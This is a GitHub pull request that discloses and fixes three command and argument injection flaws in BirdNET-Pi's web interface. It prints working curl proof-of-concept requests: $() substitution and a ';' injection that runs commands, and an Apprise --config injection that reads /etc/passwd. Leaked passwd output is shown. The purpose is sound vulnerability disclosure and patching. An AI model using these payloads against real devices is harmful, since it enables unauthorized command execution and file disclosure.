Skip to content

Fix command injection in newname, shiftfile, and sendtest#629

Open
twinvega wants to merge 1 commit into
Nachtzuster:mainfrom
twinvega:fix/security-command-injection-sqli
Open

Fix command injection in newname, shiftfile, and sendtest#629
twinvega wants to merge 1 commit into
Nachtzuster:mainfrom
twinvega:fix/security-command-injection-sqli

Conversation

@twinvega

@twinvega twinvega commented Jun 4, 2026
edited
Loading

Copy link
Copy Markdown

Fix command injection in newname, shiftfile, and sendtest

Three files had user-controlled values passed unescaped into shell commands. All require authentication to reach. None of these are addressed by PR #575.

1. play.phpnewname parameter (command injection) ✓ confirmed

Vulnerable code:

exec("...birdnet_changeidentification.sh \"$oldname\" \"$newname\" ...")

$newname is urldecode($_GET['newname']) with no shell escaping. FILTER_SANITIZE_STRING encodes " to ", preventing direct quote breakout — but $() command substitution executes inside double-quoted bash strings and passes through the filter unchanged.

Request:

curl -s -u "birdnet:" \
  "http://birdnetpi.local/play.php?changefile=2024-01-01/American_Crow/bird.wav&newname=%24%28cat+/etc/passwd%29"

Response:

Error : Error: root:x:0:0:root:/root:/bin/bash, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin,
bin:x:2:2:bin:/bin:/usr/sbin/nologin, ... vega:x:1000:1000::/home/vega:/bin/bash ...
not found in /home/vega/BirdNET-Pi/model/labels.txt

2. play.phpshiftfile$dir in mkdir (command injection) ✓ confirmed

Vulnerable code:

$dir = pathinfo($_GET['shiftfile'])['dirname'];
shell_exec("sudo mkdir -p ".$shifted_path.$dir." && ".$cmd);

$dir is unquoted in the mkdir call. A ; after a valid path segment executes a second command. Output is blind so a file write confirms execution.

Request:

curl -s -u "birdnet:" \
  "http://birdnetpi.local/play.php?shiftfile=2024-01-01/American_Crow%3Btouch+/tmp/this_is_vulnerable%3B%23/bird.wav&doshift=true"

Response:

OK

Verify: SSH into the host and check that /tmp/this_is_vulnerable exists.

3. config.phpapprise_notification_title in sendtest (argument injection) ✓ confirmed

Vulnerable code:

$cmd = "...send_test_notification.py --body $t_body_path --config $t_conf_path --title '" . escapeshellcmd($title) . '" 2>&1";

escapeshellcmd() does not escape paired single quotes. Injecting ' --config <file> --title ' overrides the Apprise config path with any file on disk. Apprise attempts to parse it as a notification config and echoes the first non-comment line in the error output — fully in-band, no external service required.

Request:

curl -s -u "birdnet:" \
  "http://birdnetpi.local/scripts/config.php?sendtest=true&apprise_notification_title='%20--config%20/etc/passwd%20--title%20'&apprise_notification_body=x&apprise_config=x" \
  | grep -oP '(?<=found ).*(?= on line)'

Response:

root:x:0:0:root:/root:/bin/bash

Fix

Replace string interpolation with escapeshellarg() in all three locations. 3 lines changed across 2 files.

@twinvega @claude
Fix command injection in newname, shiftfile, sendtest, and species de…
f0fb630 
…lete

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
@twinvega twinvega marked this pull request as ready for review June 4, 2026 17:25
@twinvega

twinvega commented Jun 4, 2026

Copy link
Copy Markdown
Author

This assumes a user that has not changed the default authentication for the WebUI.

@7h30th3r0n3 7h30th3r0n3 mentioned this pull request Jun 12, 2026
Open
6 tasks
@7h30th3r0n3

7h30th3r0n3 commented Jun 12, 2026

Copy link
Copy Markdown

same conclusion with some add

@alexbelgium alexbelgium mentioned this pull request Jun 19, 2026
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@twinvega @7h30th3r0n3